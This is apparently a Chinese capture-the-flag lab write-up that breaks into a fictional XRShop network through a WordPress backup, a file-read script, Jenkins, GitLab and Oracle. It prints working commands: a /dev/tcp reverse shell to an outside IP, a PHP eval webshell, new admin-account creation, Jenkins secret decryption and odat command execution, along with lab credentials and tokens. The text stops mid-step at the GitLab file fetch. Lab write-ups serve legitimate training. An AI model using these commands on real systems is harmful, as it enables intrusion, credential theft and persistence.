Privilege

在这个靶场中，您将扮演一名资深黑客，被雇佣来评估虚构公司XRShop的网络安全。您需要通过渗透测试逐个击破公司暴露在公网的应用，并通过后渗透技巧深入XRShop的内部网络，寻找潜在的弱点和漏洞，并通过滥用Windows特权获取管理员权限，最终并获取隐藏在其内部的核心机密。该靶场共有4个Flag，分布于不同的靶机。

剧情

第1关
请获取 XR Shop 官网源码的备份文件，并尝试获得系统上任意文件读取的能力。并且，管理员在配置 Jenkins 时，仍然选择了使用初始管理员密码，请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。
第2关
管理员为 Jenkins 配置了 Gitlab，请尝试获取 Gitlab API Token，并最终获取 Gitlab 中的敏感仓库。获取敏感信息后，尝试连接至 Oracle 数据库，并获取 ORACLE 服务器控制权限。
第3关
攻击办公区内网，获取办公 PC 控制权限，并通过特权滥用提升至 SYSTEM 权限。
第4关
尝试接管备份管理操作员帐户，并通过转储 NTDS 获得域管理员权限，最终控制整个域环境。

tag

Wordpress、Gitlab、Kerberos、内网渗透、Privilege Elevation

信息收集

./fscan.exe -h 39.99.158.160 -nobr

start infoscan
39.99.158.160:3306 open
39.99.158.160:8080 open
39.99.158.160:80 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.99.158.160:8080 code:403 len:548    title:None
[*] WebTitle http://39.99.158.160      code:200 len:54689  title:XR SHOP
[+] PocScan http://39.99.158.160/www.zip poc-yaml-backup-file

WordPress先用wpscan扫一下
wpscan --url http://39.99.158.160

[+] URL: http://39.99.158.160/ [39.99.158.160]
[+] Started: Thu Oct  2 04:07:13 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
 |  - X-Powered-By: PHP/7.4.3
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://39.99.158.160/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://39.99.158.160/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://39.99.158.160/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://39.99.158.160/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://39.99.158.160/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.2.2 identified (Insecure, released on 2023-05-20).
 | Found By: Rss Generator (Passive Detection)
 |  - http://39.99.158.160/feed/, <generator>https://wordpress.org/?v=6.2.2</generator>
 |  - http://39.99.158.160/comments/feed/, <generator>https://wordpress.org/?v=6.2.2</generator>

[+] WordPress theme in use: blossom-shop
 | Location: http://39.99.158.160/wp-content/themes/blossom-shop/
 | Last Updated: 2024-06-09T00:00:00.000Z
 | Readme: http://39.99.158.160/wp-content/themes/blossom-shop/readme.txt
 | [!] The version is out of date, the latest version is 1.2.1
 | Style URL: http://39.99.158.160/wp-content/themes/blossom-shop/style.css?ver=1.1.4
 | Style Name: Blossom Shop
 | Style URI: https://blossomthemes.com/wordpress-themes/blossom-shop/
 | Description: Blossom Shop is a clean, fast and feature-rich free WordPress theme to create online stores. It is p...
 | Author: Blossom Themes
 | Author URI: https://blossomthemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.1.4 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://39.99.158.160/wp-content/themes/blossom-shop/style.css?ver=1.1.4, Match: 'Version: 1.1.4'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] usc-e-shop
 | Location: http://39.99.158.160/wp-content/plugins/usc-e-shop/
 | Last Updated: 2025-09-08T04:44:00.000Z
 | [!] The version is out of date, the latest version is 2.11.21
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Urls In 404 Page (Passive Detection)
 |
 | Version: 2.8.18 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://39.99.158.160/wp-content/plugins/usc-e-shop/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:06 <======================> (137 / 137) 100.00% Time: 00:00:06

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Oct  2 04:07:35 2025
[+] Requests Done: 172
[+] Cached Requests: 7
[+] Data Sent: 57.84 KB
[+] Data Received: 824.364 KB
[+] Memory used: 267.406 MB
[+] Elapsed time: 00:00:21

没啥收获
读取一下www.zip备份文件，先在config.php里面找到了数据库的账号密码，尝试navicat连接，但是限制只能本地连接

define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '3%I$A*gl&9^b#' );

然后去尝试登录爆破
http://39.99.158.160/wp-login.php

无果
最后在tool目录下找到content-log.php可以进行文件读取
http://39.99.158.160/tools/content-log.php

<?php
$logfile = rawurldecode( $_GET['logfile'] );
// Make sure the file is exist.
if ( file_exists( $logfile ) ) {
  // Get the content and echo it.
  $text = file_get_contents( $logfile );
  echo( $text );
}
exit;

搜索jenkins了解到jenkins初始密码在：./jenkins/secrets/initialAdminPassword
进行读取
logfile=C:\ProgramData\Jenkins\.jenkins\secrets/initialAdminPassword

得到默认密码
510235cf43f14e83b88a9f144199655b
进行登录，可以命令执行

先尝试反弹shell
println "bash -i >& /dev/tcp/118.195.156.48/4444 0>&1".execute().text
失败
也可以写shell，但是不知道WordPress源代码的路径，需要找一下
println "cmd /c dir C:\\".execute().text
发现phpstudy，在WWW下写马
println "cmd /c echo ^<?php eval(\$_POST[0]);?^> > C:\\phpstudy_pro\\WWW\\1.php".execute().text

注意cmd的转义符是^

是Windows环境，当前用户还是system权限，可以直接添加管理员用户的，在这里添加管理员用户
println "net user xianxin pass@123 /add".execute().text
println "net localgroup administrators xianxin /add".execute().text

远程过去读取到flag01
flag01: flag{bca01e52-ed34-48eb-83b0-601aa2d4dfd8}
然后扫一下内网

C:\Users\xianxin\Desktop\upload>ipconfig

Windows IP 配置


以太网适配器 以太网:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::25b:6a65:b9a:c9a1%3
   IPv4 地址 . . . . . . . . . . . . : 172.22.14.7
   子网掩码  . . . . . . . . . . . . : 255.255.0.0
   默认网关. . . . . . . . . . . . . : 172.22.255.253

./fscan.exe -h 172.22.14.0/24

start infoscan
(icmp) Target 172.22.14.7     is alive
(icmp) Target 172.22.14.11    is alive
(icmp) Target 172.22.14.16    is alive
(icmp) Target 172.22.14.31    is alive
(icmp) Target 172.22.14.46    is alive
[*] Icmp alive hosts len is: 5
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.7:8080 open
172.22.14.7:3306 open
172.22.14.31:1521 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.11:445 open
172.22.14.7:445 open
172.22.14.16:8060 open
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.11:139 open
172.22.14.7:139 open
172.22.14.46:135 open
172.22.14.31:135 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo
[*]172.22.14.7
   [->]XR-JENKINS
   [->]172.22.14.7
[*] WebTitle http://172.22.14.46       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.14.7:8080   code:403 len:548    title:None
[*] NetInfo
[*]172.22.14.11
   [->]XR-DC
   [->]172.22.14.11
[*] NetInfo
[*]172.22.14.31
   [->]XR-ORACLE
   [->]172.22.14.31
[*] NetInfo
[*]172.22.14.46
   [->]XR-0923
   [->]172.22.14.46
[*] WebTitle http://172.22.14.16:8060  code:404 len:555    title:404 Not Found
[*] NetBios 172.22.14.31    WORKGROUP\XR-ORACLE
[*] WebTitle http://172.22.14.7        code:200 len:54603  title:XR SHOP
[*] NetBios 172.22.14.46    XIAORANG\XR-0923
[*] NetBios 172.22.14.11    [+] DC:XIAORANG\XR-DC
[*] WebTitle http://172.22.14.16       code:302 len:99     title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961  title:Sign in · GitLab
[+] PocScan http://172.22.14.7/www.zip poc-yaml-backup-file

172.22.14.7 本机
172.22.14.11 DC(域控制器)
172.22.14.16 gitlab
172.22.14.31 (XR-ORACLE) 1521端口是Oracle数据库默认端口
172.22.14.46 (XR-0923)

这里先获取gitlab的api token
在配置文件credentials.xml找到明文

如何从credentials.xml中解密Jenkins密码 - bestsrc
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
获得token

glpat-7kD_qLH2PiQv_ywB9hz2
还可以利用Jenkins的测试api功能用vps获得token

然后获取一下GitLab里面的库
curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"

[{"id":6,"description":null,"name":"Internal Secret","name_with_namespace":"XRLAB / Internal Secret","path":"internal-secret","path_with_namespace":"xrlab/internal-secret","created_at":"2022-12-25T08:30:12.362Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/internal-secret.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/internal-secret.git","web_url":"http://gitlab.xiaorang.lab/xrlab/internal-secret","readme_url":null,"avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T08:30:12.362Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/6","issues":"http://gitlab.xiaorang.lab/api/v4/projects/6/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/6/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/6/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/6/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T08:30:12.373Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":null,"import_status":"none","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":null,"group_access":{"access_level":50,"notification_level":3}}},{"id":4,"description":null,"name":"XRAdmin","name_with_namespace":"XRLAB / XRAdmin","path":"xradmin","path_with_namespace":"xrlab/xradmin","created_at":"2022-12-25T07:48:16.751Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/xradmin.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/xradmin.git","web_url":"http://gitlab.xiaorang.lab/xrlab/xradmin","readme_url":"http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md","avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2023-05-30T10:27:31.762Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/4","issues":"http://gitlab.xiaorang.lab/api/v4/projects/4/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/4/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/4/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/4/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T07:48:16.788Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":null,"import_status":"none","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":false,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":null,"group_access":{"access_level":50,"notification_level":3}}},{"id":3,"description":null,"name":"Awenode","name_with_namespace":"XRLAB / Awenode","path":"awenode","path_with_namespace":"xrlab/awenode","created_at":"2022-12-25T07:46:43.635Z","default_branch":"master","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/awenode.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/awenode.git","web_url":"http://gitlab.xiaorang.lab/xrlab/awenode","readme_url":"http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md","avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T07:46:43.635Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/3","issues":"http://gitlab.xiaorang.lab/api/v4/projects/3/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/3/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/3/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/3/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T07:46:44.614Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":"gitlab_project","import_status":"finished","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":{"access_level":40,"notification_level":null},"group_access":{"access_level":50,"notification_level":3}}},{"id":2,"description":"Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook","name":"XRWiki","name_with_namespace":"XRLAB / XRWiki","path":"xrwiki","path_with_namespace":"xrlab/xrwiki","created_at":"2022-12-25T07:44:18.589Z","default_branch":"master","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:xrlab/xrwiki.git","http_url_to_repo":"http://gitlab.xiaorang.lab/xrlab/xrwiki.git","web_url":"http://gitlab.xiaorang.lab/xrlab/xrwiki","readme_url":"http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md","avatar_url":"http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png","forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T07:44:18.589Z","namespace":{"id":8,"name":"XRLAB","path":"xrlab","kind":"group","full_path":"xrlab","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/xrlab"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/2","issues":"http://gitlab.xiaorang.lab/api/v4/projects/2/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/2/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/2/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/2/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"},"packages_enabled":true,"empty_repo":false,"archived":false,"visibility":"private","resolve_outdated_diff_discussions":null,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T07:44:18.627Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":false,"jobs_enabled":true,"snippets_enabled":false,"container_registry_enabled":false,"service_desk_enabled":false,"service_desk_address":null,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"disabled","builds_access_level":"enabled","snippets_access_level":"disabled","pages_access_level":"public","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"disabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":2,"import_url":null,"import_type":"gitlab_project","import_status":"finished","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":false,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":{"access_level":40,"notification_level":null},"group_access":{"access_level":50,"notification_level":3}}},{"id":1,"description":"This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).","name":"Monitoring","name_with_namespace":"GitLab Instance / Monitoring","path":"Monitoring","path_with_namespace":"gitlab-instance-23352f48/Monitoring","created_at":"2022-12-25T07:18:20.914Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git","http_url_to_repo":"http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git","web_url":"http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring","readme_url":null,"avatar_url":null,"forks_count":0,"star_count":0,"last_activity_at":"2022-12-25T07:18:20.914Z","namespace":{"id":2,"name":"GitLab Instance","path":"gitlab-instance-23352f48","kind":"group","full_path":"gitlab-instance-23352f48","parent_id":null,"avatar_url":null,"web_url":"http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"},"_links":{"self":"http://gitlab.xiaorang.lab/api/v4/projects/1","issues":"http://gitlab.xiaorang.lab/api/v4/projects/1/issues","merge_requests":"http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests","repo_branches":"http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches","labels":"http://gitlab.xiaorang.lab/api/v4/projects/1/labels","events":"http://gitlab.xiaorang.lab/api/v4/projects/1/events","members":"http://gitlab.xiaorang.lab/api/v4/projects/1/members","cluster_agents":"http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"},"packages_enabled":true,"empty_repo":true,"archived":false,"visibility":"internal","resolve_outdated_diff_discussions":false,"container_expiration_policy":{"cadence":"1d","enabled":false,"keep_n":10,"older_than":"90d","name_regex":".*","name_regex_keep":null,"next_run_at":"2022-12-26T07:18:21.108Z"},"issues_enabled":true,"merge_requests_enabled":true,"wiki_enabled":true,"jobs_enabled":true,"snippets_enabled":true,"container_registry_enabled":true,"service_desk_enabled":false,"can_create_merge_request_in":true,"issues_access_level":"enabled","repository_access_level":"enabled","merge_requests_access_level":"enabled","forking_access_level":"enabled","wiki_access_level":"enabled","builds_access_level":"enabled","snippets_access_level":"enabled","pages_access_level":"private","operations_access_level":"enabled","analytics_access_level":"enabled","container_registry_access_level":"enabled","security_and_compliance_access_level":"private","releases_access_level":"enabled","environments_access_level":"enabled","feature_flags_access_level":"enabled","infrastructure_access_level":"enabled","monitor_access_level":"enabled","emails_disabled":null,"shared_runners_enabled":true,"lfs_enabled":true,"creator_id":1,"import_status":"none","open_issues_count":0,"ci_default_git_depth":20,"ci_forward_deployment_enabled":true,"ci_job_token_scope_enabled":false,"ci_separated_caches":true,"ci_opt_in_jwt":false,"ci_allow_fork_pipelines_to_run_in_parent_project":true,"public_jobs":true,"build_timeout":3600,"auto_cancel_pending_pipelines":"enabled","ci_config_path":null,"shared_with_groups":[],"only_allow_merge_if_pipeline_succeeds":false,"allow_merge_on_skipped_pipeline":null,"restrict_user_defined_variables":false,"request_access_enabled":true,"only_allow_merge_if_all_discussions_are_resolved":false,"remove_source_branch_after_merge":true,"printing_merge_request_link_enabled":true,"merge_method":"merge","squash_option":"default_off","enforce_auth_checks_on_uploads":true,"suggestion_commit_message":null,"merge_commit_template":null,"squash_commit_template":null,"issue_branch_template":null,"auto_devops_enabled":true,"auto_devops_deploy_strategy":"continuous","autoclose_referenced_issues":true,"keep_latest_artifact":true,"runner_token_expiration_interval":null,"permissions":{"project_access":null,"group_access":null}}]

传个stowaway挂个代理
windows_x64_agent.exe -l 44444 -s 123
./linux_x64_admin -c 39.99.158.160:44444 -s 123
有敏感信息的只有xradmin.git和internal-secret.git
然后把xradmin.git库clone下来
git -C ./code/ clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git
在xradmin/ruoyi-admin/src/main/resources/application-druid.yml找到Oracle的账密

┌──(root㉿kali)-[/home/…/ruoyi-admin/src/main/resources]
└─# cat application-druid.yml 
# 数据源配置
spring:
    datasource:
        type: com.alibaba.druid.pool.DruidDataSource
        driverClassName: oracle.jdbc.driver.OracleDriver
        druid:
            # 主库数据源
            master:
                url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
                username: xradmin
                password: fcMyE8t9E4XdsKf
            # 从库数据源
            slave:
                # 从数据源开关/默认关闭
                enabled: false

windows上挂个代理
windows_x64_agent.exe -l 44445 -s 123
./windows_x64_admin.exe -c 39.99.158.160:44445 -s 123
但是MDUT用不了，navicat也连不上不知道为什么

最后用odat工具直接利用，命令无回显，加用户
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user xianxin pass@123 /add'
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup Administrators xianxin /add'

rdp上去获取flag02

flag02: flag{c09e8308-596a-4e16-b31c-06179b256baf}
然后用gitlab的api获取internal-secret.git的内容
curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects/6/repository/tree"

1	[{"id":"fec38069bee81dbfb4dba3b5d9b62f26b07bf42f","name":"credentials.txt","type":"blob","path":"credentials.txt","mode":"100644"}]

读取credentials.txt的内容
curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects/6/repository/files/credentials.txt"
没成功，查一下git api文档，发现需要指定ref
curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects/6/repository/files/credentials.txt?ref=main"

